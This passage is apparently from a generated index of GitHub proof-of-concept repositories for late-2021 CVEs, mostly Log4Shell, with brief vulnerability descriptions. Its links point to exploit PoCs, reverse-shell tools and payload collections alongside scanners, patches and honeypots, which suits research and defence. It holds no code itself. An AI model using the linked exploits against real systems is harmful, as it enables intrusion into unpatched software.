MinIO is a Kubernetes native application for cloud storage. Prior to version `RELEASE.2021-12-27T07-23-18Z`, a malicious client can hand-craft an HTTP API call that allows for updating policy for a user and gaining higher privileges. The patch in version `RELEASE.2021-12-27T07-23-18Z` changes the accepted request body type and removes the ability to apply policy changes through this API. There is a workaround for this vulnerability: Changing passwords can be disabled by adding an explicit `Deny` rule to disable the API for users.
- [khuntor/CVE-2021-43858-MinIO](https://github.com/khuntor/CVE-2021-43858-MinIO)
### CVE-2021-43883 (2021-12-15)
Windows Installer Elevation of Privilege Vulnerability
- [jbaines-r7/shakeitoff](https://github.com/jbaines-r7/shakeitoff)
### CVE-2021-43891 (2021-12-15)
Visual Studio Code Remote Code Execution Vulnerability
- [parsiya/code-wsl-rce](https://github.com/parsiya/code-wsl-rce)
### CVE-2021-43893 (2021-12-15)
Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability
- [jbaines-r7/blankspace](https://github.com/jbaines-r7/blankspace)
### CVE-2021-43908 (2021-12-15)
Visual Studio Code Spoofing Vulnerability
- [Sudistark/vscode-rce-electrovolt](https://github.com/Sudistark/vscode-rce-electrovolt)
### CVE-2021-43936 (2021-12-06)
The software allows the attacker to upload or transfer files of dangerous types to the WebHMI portal, that may be automatically processed within the product's environment or lead to arbitrary code execution.
- [LongWayHomie/CVE-2021-43936](https://github.com/LongWayHomie/CVE-2021-43936)
### CVE-2021-44026 (2021-11-19)
Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search_params.
- [pentesttoolscom/roundcube-cve-2021-44026](https://github.com/pentesttoolscom/roundcube-cve-2021-44026)
### CVE-2021-44077 (2021-11-29)
Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.
- [horizon3ai/CVE-2021-44077](https://github.com/horizon3ai/CVE-2021-44077)
- [pizza-power/Golang-CVE-2021-44077-POC](https://github.com/pizza-power/Golang-CVE-2021-44077-POC)
### CVE-2021-44103
- [paulotrindadec/CVE-2021-44103](https://github.com/paulotrindadec/CVE-2021-44103)
### CVE-2021-44117 (2022-06-10)
A Cross Site Request Forgery (CSRF) vulnerability exists in TheDayLightStudio Fuel CMS 1.5.0 via a POST call to /fuel/sitevariables/delete/4.
- [warmachine-57/CVE-2021-44117](https://github.com/warmachine-57/CVE-2021-44117)
### CVE-2021-44132 (2022-02-25)
A command injection vulnerability in the function formImportOMCIShell of C-DATA ONU4FERW V2.1.13_X139 allows attackers to execute arbitrary commands via a crafted file.
- [exploitwritter/CVE-2021-44132](https://github.com/exploitwritter/CVE-2021-44132)
### CVE-2021-44142 (2022-02-21)
The Samba vfs_fruit module uses extended file attributes (EA, xattr) to provide "...enhanced compatibility with Apple SMB clients and interoperability with a Netatalk 3 AFP fileserver." Samba versions prior to 4.13.17, 4.14.12 and 4.15.5 with vfs_fruit configured allow out-of-bounds heap read and write via specially crafted extended file attributes. A remote attacker with write access to extended file attributes can execute arbitrary code with the privileges of smbd, typically root.
- [hrsman/Samba-CVE-2021-44142](https://github.com/hrsman/Samba-CVE-2021-44142)
- [horizon3ai/CVE-2021-44142](https://github.com/horizon3ai/CVE-2021-44142)
- [gudyrmik/CVE-2021-44142](https://github.com/gudyrmik/CVE-2021-44142)
### CVE-2021-44168 (2022-01-04)
A download of code without integrity check vulnerability in the "execute restore src-vis" command of FortiOS before 7.0.3 may allow a local authenticated attacker to download arbitrary files on the device via specially crafted update packages.
- [0xhaggis/CVE-2021-44168](https://github.com/0xhaggis/CVE-2021-44168)
### CVE-2021-44217 (2022-01-18)
In Ericsson CodeChecker through 6.18.0, a Stored Cross-site scripting (XSS) vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API.
- [Hyperkopite/CVE-2021-44217](https://github.com/Hyperkopite/CVE-2021-44217)
### CVE-2021-44228 (2021-12-10)
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
- [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)
- [Glease/Healer](https://github.com/Glease/Healer)
- [jacobtread/L4J-Vuln-Patch](https://github.com/jacobtread/L4J-Vuln-Patch)
- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228)
- [HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept)
- [boundaryx/cloudrasp-log4j2](https://github.com/boundaryx/cloudrasp-log4j2)
- [dbgee/CVE-2021-44228](https://github.com/dbgee/CVE-2021-44228)
- [CreeperHost/Log4jPatcher](https://github.com/CreeperHost/Log4jPatcher)
- [DragonSurvivalEU/RCE](https://github.com/DragonSurvivalEU/RCE)
- [simonis/Log4jPatch](https://github.com/simonis/Log4jPatch)
- [zlepper/CVE-2021-44228-Test-Server](https://github.com/zlepper/CVE-2021-44228-Test-Server)
- [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)
- [NorthwaveSecurity/log4jcheck](https://github.com/NorthwaveSecurity/log4jcheck)
- [nkoneko/VictimApp](https://github.com/nkoneko/VictimApp)
- [lhotari/pulsar-docker-images-patch-CVE-2021-44228](https://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228)
- [1in9e/Apache-Log4j2-RCE](https://github.com/1in9e/Apache-Log4j2-RCE)
- [KosmX/CVE-2021-44228-example](https://github.com/KosmX/CVE-2021-44228-example)
- [greymd/CVE-2021-44228](https://github.com/greymd/CVE-2021-44228)
- [mubix/CVE-2021-44228-Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes)
- [OopsieWoopsie/mc-log4j-patcher](https://github.com/OopsieWoopsie/mc-log4j-patcher)
- [wheez-y/CVE-2021-44228-kusto](https://github.com/wheez-y/CVE-2021-44228-kusto)
- [izzyacademy/log4shell-mitigation](https://github.com/izzyacademy/log4shell-mitigation)
- [Kadantte/CVE-2021-44228-poc](https://github.com/Kadantte/CVE-2021-44228-poc)
- [takito1812/log4j-detect](https://github.com/takito1812/log4j-detect)
- [winnpixie/log4noshell](https://github.com/winnpixie/log4noshell)
- [Azeemering/CVE-2021-44228-DFIR-Notes](https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes)
- [Puliczek/CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)
- [kozmer/log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc)
- [alexandreroman/cve-2021-44228-workaround-buildpack](https://github.com/alexandreroman/cve-2021-44228-workaround-buildpack)
- [Adikso/minecraft-log4j-honeypot](https://github.com/Adikso/minecraft-log4j-honeypot)
- [racoon-rac/CVE-2021-44228](https://github.com/racoon-rac/CVE-2021-44228)
- [TheArqsz/CVE-2021-44228-PoC](https://github.com/TheArqsz/CVE-2021-44228-PoC)
- [1lann/log4shelldetect](https://github.com/1lann/log4shelldetect)
- [binganao/Log4j2-RCE](https://github.com/binganao/Log4j2-RCE)
- [phoswald/sample-ldap-exploit](https://github.com/phoswald/sample-ldap-exploit)
- [rakutentech/jndi-ldap-test-server](https://github.com/rakutentech/jndi-ldap-test-server)
- [uint0/cve-2021-44228--spring-hibernate](https://github.com/uint0/cve-2021-44228--spring-hibernate)
- [saharNooby/log4j-vulnerability-patcher-agent](https://github.com/saharNooby/log4j-vulnerability-patcher-agent)
- [f0ng/log4j2burpscanner](https://github.com/f0ng/log4j2burpscanner)
- [M1ngGod/CVE-2021-44228-Log4j-lookup-Rce](https://github.com/M1ngGod/CVE-2021-44228-Log4j-lookup-Rce)
- [byteboycn/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/byteboycn/CVE-2021-44228-Apache-Log4j-Rce)
- [lhotari/log4shell-mitigation-tester](https://github.com/lhotari/log4shell-mitigation-tester)
- [toramanemre/log4j-rce-detect-waf-bypass](https://github.com/toramanemre/log4j-rce-detect-waf-bypass)
- [logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
- [vorburger/Log4j_CVE-2021-44228](https://github.com/vorburger/Log4j_CVE-2021-44228)
- [gauthamg/log4j2021_vul_test](https://github.com/gauthamg/log4j2021_vul_test)
- [b-abderrahmane/CVE-2021-44228-playground](https://github.com/b-abderrahmane/CVE-2021-44228-playground)
- [leetxyz/CVE-2021-44228-Advisories](https://github.com/leetxyz/CVE-2021-44228-Advisories)
- [cado-security/log4shell](https://github.com/cado-security/log4shell)
- [WYSIIWYG/Log4J_0day_RCE](https://github.com/WYSIIWYG/Log4J_0day_RCE)
- [mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform](https://github.com/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform)
- [Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs](https://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs)
- [zzzz0317/log4j2-vulnerable-spring-app](https://github.com/zzzz0317/log4j2-vulnerable-spring-app)
- [datadavev/test-44228](https://github.com/datadavev/test-44228)
- [LemonCraftRu/JndiRemover](https://github.com/LemonCraftRu/JndiRemover)
- [zhangxvx/Log4j-Rec-CVE-2021-44228](https://github.com/zhangxvx/Log4j-Rec-CVE-2021-44228)
- [darkarnium/Log4j-CVE-Detect](https://github.com/darkarnium/Log4j-CVE-Detect)
- [chilliwebs/CVE-2021-44228_Example](https://github.com/chilliwebs/CVE-2021-44228_Example)
- [irgoncalves/f5-waf-enforce-sig-CVE-2021-44228](https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228)
- [jeffbryner/log4j-docker-vaccine](https://github.com/jeffbryner/log4j-docker-vaccine)
- [mergebase/log4j-detector](https://github.com/mergebase/log4j-detector)
- [unlimitedsola/log4j2-rce-poc](https://github.com/unlimitedsola/log4j2-rce-poc)
- [Jeromeyoung/log4j2burpscanner](https://github.com/Jeromeyoung/log4j2burpscanner)
- [corretto/hotpatch-for-apache-log4j2](https://github.com/corretto/hotpatch-for-apache-log4j2)
- [alexandre-lavoie/python-log4rce](https://github.com/alexandre-lavoie/python-log4rce)
- [RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs](https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs)
- [mzlogin/CVE-2021-44228-Demo](https://github.com/mzlogin/CVE-2021-44228-Demo)
- [blake-fm/vcenter-log4j](https://github.com/blake-fm/vcenter-log4j)
- [creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review](https://github.com/creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review)
- [uint0/cve-2021-44228-helpers](https://github.com/uint0/cve-2021-44228-helpers)
- [RK800-DEV/apache-log4j-poc](https://github.com/RK800-DEV/apache-log4j-poc)
- [sud0x00/log4j-CVE-2021-44228](https://github.com/sud0x00/log4j-CVE-2021-44228)
- [DiCanio/CVE-2021-44228-docker-example](https://github.com/DiCanio/CVE-2021-44228-docker-example)
- [myyxl/cve-2021-44228-minecraft-poc](https://github.com/myyxl/cve-2021-44228-minecraft-poc)
- [RrUZi/Awesome-CVE-2021-44228](https://github.com/RrUZi/Awesome-CVE-2021-44228)
- [future-client/CVE-2021-44228](https://github.com/future-client/CVE-2021-44228)
- [CodeShield-Security/Log4JShell-Bytecode-Detector](https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector)
- [Crane-Mocker/log4j-poc](https://github.com/Crane-Mocker/log4j-poc)
- [dtact/divd-2021-00038--log4j-scanner](https://github.com/dtact/divd-2021-00038--log4j-scanner)
- [kali-dass/CVE-2021-44228-log4Shell](https://github.com/kali-dass/CVE-2021-44228-log4Shell)
- [pravin-pp/log4j2-CVE-2021-44228](https://github.com/pravin-pp/log4j2-CVE-2021-44228)
- [Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228](https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228)
- [urholaukkarinen/docker-log4shell](https://github.com/urholaukkarinen/docker-log4shell)
- [ssl/scan4log4j](https://github.com/ssl/scan4log4j)
- [infiniroot/nginx-mitigate-log4shell](https://github.com/infiniroot/nginx-mitigate-log4shell)
- [lohanichaten/log4j-cve-2021-44228](https://github.com/lohanichaten/log4j-cve-2021-44228)
- [authomize/log4j-log4shell-affected](https://github.com/authomize/log4j-log4shell-affected)
- [guardicode/CVE-2021-44228_IoCs](https://github.com/guardicode/CVE-2021-44228_IoCs)
- [fireflyingup/log4j-poc](https://github.com/fireflyingup/log4j-poc)
- [qingtengyun/cve-2021-44228-qingteng-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-patch)
- [nccgroup/log4j-jndi-be-gone](https://github.com/nccgroup/log4j-jndi-be-gone)
- [qingtengyun/cve-2021-44228-qingteng-online-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch)
- [tasooshi/horrors-log4shell](https://github.com/tasooshi/horrors-log4shell)
- [Hydragyrum/evil-rmi-server](https://github.com/Hydragyrum/evil-rmi-server)
- [twseptian/spring-boot-log4j-cve-2021-44228-docker-lab](https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab)
- [OlafHaalstra/log4jcheck](https://github.com/OlafHaalstra/log4jcheck)
- [Panyaprach/Prove-CVE-2021-44228](https://github.com/Panyaprach/Prove-CVE-2021-44228)
- [momos1337/Log4j-RCE](https://github.com/momos1337/Log4j-RCE)
- [palominoinc/cve-2021-44228-log4j-mitigation](https://github.com/palominoinc/cve-2021-44228-log4j-mitigation)
- [cyberxml/log4j-poc](https://github.com/cyberxml/log4j-poc)
- [corneacristian/Log4J-CVE-2021-44228-RCE](https://github.com/corneacristian/Log4J-CVE-2021-44228-RCE)
- [Diverto/nse-log4shell](https://github.com/Diverto/nse-log4shell)
- [dotPY-hax/log4py](https://github.com/dotPY-hax/log4py)
- [sunnyvale-it/CVE-2021-44228-PoC](https://github.com/sunnyvale-it/CVE-2021-44228-PoC)
- [maxant/log4j2-CVE-2021-44228](https://github.com/maxant/log4j2-CVE-2021-44228)
- [atnetws/fail2ban-log4j](https://github.com/atnetws/fail2ban-log4j)
- [kimobu/cve-2021-44228](https://github.com/kimobu/cve-2021-44228)
- [ph0lk3r/anti-jndi](https://github.com/ph0lk3r/anti-jndi)
- [bigsizeme/Log4j-check](https://github.com/bigsizeme/Log4j-check)
- [pedrohavay/exploit-CVE-2021-44228](https://github.com/pedrohavay/exploit-CVE-2021-44228)
- [0xRyan/log4j-nullroute](https://github.com/0xRyan/log4j-nullroute)
- [fireeye/CVE-2021-44228](https://github.com/fireeye/CVE-2021-44228)
- [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan)
- [rubo77/log4j_checker_beta](https://github.com/rubo77/log4j_checker_beta)
- [thecyberneh/Log4j-RCE-Exploiter](https://github.com/thecyberneh/Log4j-RCE-Exploiter)
- [halibobor/log4j2](https://github.com/halibobor/log4j2)
- [sourcegraph/log4j-cve-code-search-resources](https://github.com/sourcegraph/log4j-cve-code-search-resources)
- [thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832](https://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832)
- [helsecert/CVE-2021-44228](https://github.com/helsecert/CVE-2021-44228)
- [markuman/aws-log4j-mitigations](https://github.com/markuman/aws-log4j-mitigations)
- [tuyenee/Log4shell](https://github.com/tuyenee/Log4shell)
- [JiuBanSec/Log4j-CVE-2021-44228](https://github.com/JiuBanSec/Log4j-CVE-2021-44228)
- [ycdxsb/Log4Shell-CVE-2021-44228-ENV](https://github.com/ycdxsb/Log4Shell-CVE-2021-44228-ENV)
- [avwolferen/Sitecore.Solr-log4j-mitigation](https://github.com/avwolferen/Sitecore.Solr-log4j-mitigation)
- [kek-Sec/log4j-scanner-CVE-2021-44228](https://github.com/kek-Sec/log4j-scanner-CVE-2021-44228)
- [Camphul/log4shell-spring-framework-research](https://github.com/Camphul/log4shell-spring-framework-research)
- [lov3r/cve-2021-44228-log4j-exploits](https://github.com/lov3r/cve-2021-44228-log4j-exploits)
- [sinakeshmiri/log4jScan](https://github.com/sinakeshmiri/log4jScan)
- [0xDexter0us/Log4J-Scanner](https://github.com/0xDexter0us/Log4J-Scanner)
- [LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228](https://github.com/LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228)
- [0xsyr0/Log4Shell](https://github.com/0xsyr0/Log4Shell)
- [1hakusai1/log4j-rce-CVE-2021-44228](https://github.com/1hakusai1/log4j-rce-CVE-2021-44228)
- [jeffli1024/log4j-rce-test](https://github.com/jeffli1024/log4j-rce-test)
- [zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service](https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service)
- [manuel-alvarez-alvarez/log4j-cve-2021-44228](https://github.com/manuel-alvarez-alvarez/log4j-cve-2021-44228)
- [VNYui/CVE-2021-44228](https://github.com/VNYui/CVE-2021-44228)
- [flxhaas/Scan-CVE-2021-44228](https://github.com/flxhaas/Scan-CVE-2021-44228)
- [justakazh/Log4j-CVE-2021-44228](https://github.com/justakazh/Log4j-CVE-2021-44228)
- [irgoncalves/f5-waf-quick-patch-cve-2021-44228](https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228)
- [madCdan/JndiLookup](https://github.com/madCdan/JndiLookup)
- [Koupah/MC-Log4j-Patcher](https://github.com/Koupah/MC-Log4j-Patcher)
- [AlexandreHeroux/Fix-CVE-2021-44228](https://github.com/AlexandreHeroux/Fix-CVE-2021-44228)
- [kossatzd/log4j-CVE-2021-44228-test](https://github.com/kossatzd/log4j-CVE-2021-44228-test)
- [tobiasoed/log4j-CVE-2021-44228](https://github.com/tobiasoed/log4j-CVE-2021-44228)
- [hackinghippo/log4shell_ioc_ips](https://github.com/hackinghippo/log4shell_ioc_ips)
- [p3dr16k/log4j-1.2.15-mod](https://github.com/p3dr16k/log4j-1.2.15-mod)
- [claranet/ansible-role-log4shell](https://github.com/claranet/ansible-role-log4shell)
- [taurusxin/CVE-2021-44228](https://github.com/taurusxin/CVE-2021-44228)
- [corelight/cve-2021-44228](https://github.com/corelight/cve-2021-44228)
- [rodfer0x80/log4j2-prosecutor](https://github.com/rodfer0x80/log4j2-prosecutor)
- [yanghaoi/CVE-2021-44228_Log4Shell](https://github.com/yanghaoi/CVE-2021-44228_Log4Shell)
- [lfama/log4j_checker](https://github.com/lfama/log4j_checker)
- [threatmonit/Log4j-IOCs](https://github.com/threatmonit/Log4j-IOCs)
- [ben-smash/l4j-info](https://github.com/ben-smash/l4j-info)
- [strawhatasif/log4j-test](https://github.com/strawhatasif/log4j-test)
- [giterlizzi/nmap-log4shell](https://github.com/giterlizzi/nmap-log4shell)
- [tica506/Siem-queries-for-CVE-2021-44228](https://github.com/tica506/Siem-queries-for-CVE-2021-44228)
- [chilit-nl/log4shell-example](https://github.com/chilit-nl/log4shell-example)
- [Occamsec/log4j-checker](https://github.com/Occamsec/log4j-checker)
- [snatalius/log4j2-CVE-2021-44228-poc-local](https://github.com/snatalius/log4j2-CVE-2021-44228-poc-local)
- [Contrast-Security-OSS/CVE-2021-44228](https://github.com/Contrast-Security-OSS/CVE-2021-44228)
- [back2root/log4shell-rex](https://github.com/back2root/log4shell-rex)
- [alexbakker/log4shell-tools](https://github.com/alexbakker/log4shell-tools)
- [perryflynn/find-log4j](https://github.com/perryflynn/find-log4j)
- [alpacamybags118/log4j-cve-2021-44228-sample](https://github.com/alpacamybags118/log4j-cve-2021-44228-sample)
- [sandarenu/log4j2-issue-check](https://github.com/sandarenu/log4j2-issue-check)
- [roticagas/CVE-2021-44228-Demo](https://github.com/roticagas/CVE-2021-44228-Demo)
- [Woahd/log4j-urlscanner](https://github.com/Woahd/log4j-urlscanner)
- [faisalfs10x/Log4j2-CVE-2021-44228-revshell](https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell)
- [gcmurphy/chk_log4j](https://github.com/gcmurphy/chk_log4j)
- [0xInfection/LogMePwn](https://github.com/0xInfection/LogMePwn)
- [toramanemre/apache-solr-log4j-CVE-2021-44228](https://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228)
- [codiobert/log4j-scanner](https://github.com/codiobert/log4j-scanner)
- [cbuschka/log4j2-rce-recap](https://github.com/cbuschka/log4j2-rce-recap)
- [andrii-kovalenko-celonis/log4j-vulnerability-demo](https://github.com/andrii-kovalenko-celonis/log4j-vulnerability-demo)
- [dark-ninja10/Log4j-CVE-2021-44228](https://github.com/dark-ninja10/Log4j-CVE-2021-44228)
- [fox-it/log4j-finder](https://github.com/fox-it/log4j-finder)
- [34zY/JNDI-Exploit-1.2-log4shell](https://github.com/34zY/JNDI-Exploit-1.2-log4shell)
- [didoatanasov/cve-2021-44228](https://github.com/didoatanasov/cve-2021-44228)
- [ReynerGonzalez/Security-Log4J-Tester](https://github.com/ReynerGonzalez/Security-Log4J-Tester)
- [ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228](https://github.com/ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228)
- [wortell/log4j](https://github.com/wortell/log4j)
- [municipalparkingservices/CVE-2021-44228-Scanner](https://github.com/municipalparkingservices/CVE-2021-44228-Scanner)
- [BinaryDefense/log4j-honeypot-flask](https://github.com/BinaryDefense/log4j-honeypot-flask)
- [MalwareTech/Log4jTools](https://github.com/MalwareTech/Log4jTools)
- [mufeedvh/log4jail](https://github.com/mufeedvh/log4jail)
- [guerzon/log4shellpoc](https://github.com/guerzon/log4shellpoc)
- [ab0x90/CVE-2021-44228_PoC](https://github.com/ab0x90/CVE-2021-44228_PoC)
- [stripe/log4j-remediation-tools](https://github.com/stripe/log4j-remediation-tools)
- [xsultan/log4jshield](https://github.com/xsultan/log4jshield)
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
- [0xThiebaut/CVE-2021-44228](https://github.com/0xThiebaut/CVE-2021-44228)
- [CERTCC/CVE-2021-44228_scanner](https://github.com/CERTCC/CVE-2021-44228_scanner)
- [CrackerCat/CVE-2021-44228-Log4j-Payloads](https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads)
- [dbzoo/log4j_scanner](https://github.com/dbzoo/log4j_scanner)
- [jeremyrsellars/CVE-2021-44228_scanner](https://github.com/jeremyrsellars/CVE-2021-44228_scanner)
- [JustinDPerkins/C1-WS-LOG4SHELL](https://github.com/JustinDPerkins/C1-WS-LOG4SHELL)
- [VinniMarcon/Log4j-Updater](https://github.com/VinniMarcon/Log4j-Updater)
- [bhprin/log4j-vul](https://github.com/bhprin/log4j-vul)
- [avirahul007/CVE-2021-44228](https://github.com/avirahul007/CVE-2021-44228)
- [rgl/log4j-log4shell-playground](https://github.com/rgl/log4j-log4shell-playground)
- [anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228](https://github.com/anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228)
- [KeysAU/Get-log4j-Windows.ps1](https://github.com/KeysAU/Get-log4j-Windows.ps1)
- [kubearmor/log4j-CVE-2021-44228](https://github.com/kubearmor/log4j-CVE-2021-44228)
- [jyotisahu98/logpresso-CVE-2021-44228-Scanner](https://github.com/jyotisahu98/logpresso-CVE-2021-44228-Scanner)
- [gitlab-de/log4j-resources](https://github.com/gitlab-de/log4j-resources)
- [redhuntlabs/Log4JHunt](https://github.com/redhuntlabs/Log4JHunt)
- [mss/log4shell-hotfix-side-effect](https://github.com/mss/log4shell-hotfix-side-effect)
- [MeterianHQ/log4j-vuln-coverage-check](https://github.com/MeterianHQ/log4j-vuln-coverage-check)
- [sebiboga/jmeter-fix-cve-2021-44228-windows](https://github.com/sebiboga/jmeter-fix-cve-2021-44228-windows)
- [mitiga/log4shell-cloud-scanner](https://github.com/mitiga/log4shell-cloud-scanner)
- [isuruwa/Log4j](https://github.com/isuruwa/Log4j)
- [honeynet/log4shell-data](https://github.com/honeynet/log4shell-data)
- [inettgmbh/checkmk-log4j-scanner](https://github.com/inettgmbh/checkmk-log4j-scanner)
- [b1tm0n3r/CVE-2021-44228](https://github.com/b1tm0n3r/CVE-2021-44228)
- [VerveIndustrialProtection/CVE-2021-44228-Log4j](https://github.com/VerveIndustrialProtection/CVE-2021-44228-Log4j)
- [alenazi90/log4j](https://github.com/alenazi90/log4j)
- [pmontesd/log4j-cve-2021-44228](https://github.com/pmontesd/log4j-cve-2021-44228)
- [LiveOverflow/log4shell](https://github.com/LiveOverflow/log4shell)
- [aws-samples/kubernetes-log4j-cve-2021-44228-node-agent](https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent)
- [michaelsanford/Log4Shell-Honeypot](https://github.com/michaelsanford/Log4Shell-Honeypot)
- [thomaspatzke/Log4Pot](https://github.com/thomaspatzke/Log4Pot)
- [ubitech/cve-2021-44228-rce-poc](https://github.com/ubitech/cve-2021-44228-rce-poc)
- [rv4l3r3/log4v-vuln-check](https://github.com/rv4l3r3/log4v-vuln-check)
- [dpomnean/log4j_scanner_wrapper](https://github.com/dpomnean/log4j_scanner_wrapper)
- [roxas-tan/CVE-2021-44228](https://github.com/roxas-tan/CVE-2021-44228)
- [shamo0/CVE-2021-44228](https://github.com/shamo0/CVE-2021-44228)
- [snow0715/log4j-Scan-Burpsuite](https://github.com/snow0715/log4j-Scan-Burpsuite)
- [Joefreedy/Log4j-Windows-Scanner](https://github.com/Joefreedy/Log4j-Windows-Scanner)
- [Nanitor/log4fix](https://github.com/Nanitor/log4fix)
- [Gyrfalc0n/scanlist-log4j](https://github.com/Gyrfalc0n/scanlist-log4j)
- [korteke/log4shell-demo](https://github.com/korteke/log4shell-demo)
- [recanavar/vuln_spring_log4j2](https://github.com/recanavar/vuln_spring_log4j2)
- [DXC-StrikeForce/Burp-Log4j-HammerTime](https://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime)
- [andalik/log4j-filescan](https://github.com/andalik/log4j-filescan)
- [lonecloud/CVE-2021-44228-Apache-Log4j](https://github.com/lonecloud/CVE-2021-44228-Apache-Log4j)
- [gyaansastra/CVE-2021-44228](https://github.com/gyaansastra/CVE-2021-44228)
- [axisops/CVE-2021-44228](https://github.com/axisops/CVE-2021-44228)
- [kal1gh0st/MyLog4Shell](https://github.com/kal1gh0st/MyLog4Shell)
- [hozyx/log4shell](https://github.com/hozyx/log4shell)
- [andypitcher/Log4J_checker](https://github.com/andypitcher/Log4J_checker)
- [Vulnmachines/log4j-cve-2021-44228](https://github.com/Vulnmachines/log4j-cve-2021-44228)
- [kannthu/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/kannthu/CVE-2021-44228-Apache-Log4j-Rce)
- [Kr0ff/CVE-2021-44228](https://github.com/Kr0ff/CVE-2021-44228)
- [suuhm/log4shell4shell](https://github.com/suuhm/log4shell4shell)
- [wajda/log4shell-test-exploit](https://github.com/wajda/log4shell-test-exploit)
- [obscuritylabs/log4shell-poc-lab](https://github.com/obscuritylabs/log4shell-poc-lab)
- [Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228](https://github.com/Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228)
- [Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE](https://github.com/Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE)
- [rohan-flutterint/CVE-2021-44228_scanner](https://github.com/rohan-flutterint/CVE-2021-44228_scanner)
- [sysadmin0815/Fix-Log4j-PowershellScript](https://github.com/sysadmin0815/Fix-Log4j-PowershellScript)
- [RenYuH/log4j-lookups-vulnerability](https://github.com/RenYuH/log4j-lookups-vulnerability)
- [scheibling/py-log4shellscanner](https://github.com/scheibling/py-log4shellscanner)
- [zaneef/CVE-2021-44228](https://github.com/zaneef/CVE-2021-44228)
- [metodidavidovic/log4j-quick-scan](https://github.com/metodidavidovic/log4j-quick-scan)
- [WatchGuard-Threat-Lab/log4shell-iocs](https://github.com/WatchGuard-Threat-Lab/log4shell-iocs)
- [Aschen/log4j-patched](https://github.com/Aschen/log4j-patched)
- [Nikolas-Charalambidis/cve-2021-44228](https://github.com/Nikolas-Charalambidis/cve-2021-44228)
- [m0rath/detect-log4j-exploitable](https://github.com/m0rath/detect-log4j-exploitable)
- [nu11secur1ty/CVE-2021-44228-VULN-APP](https://github.com/nu11secur1ty/CVE-2021-44228-VULN-APP)
- [ankur-katiyar/log4j-docker](https://github.com/ankur-katiyar/log4j-docker)
- [immunityinc/Log4j-JNDIServer](https://github.com/immunityinc/Log4j-JNDIServer)
- [DANSI/PowerShell-Log4J-Scanner](https://github.com/DANSI/PowerShell-Log4J-Scanner)
- [suniastar/scan-log4shell](https://github.com/suniastar/scan-log4shell)
- [shivakumarjayaraman/log4jvulnerability-CVE-2021-44228](https://github.com/shivakumarjayaraman/log4jvulnerability-CVE-2021-44228)
- [j3kz/CVE-2021-44228-PoC](https://github.com/j3kz/CVE-2021-44228-PoC)
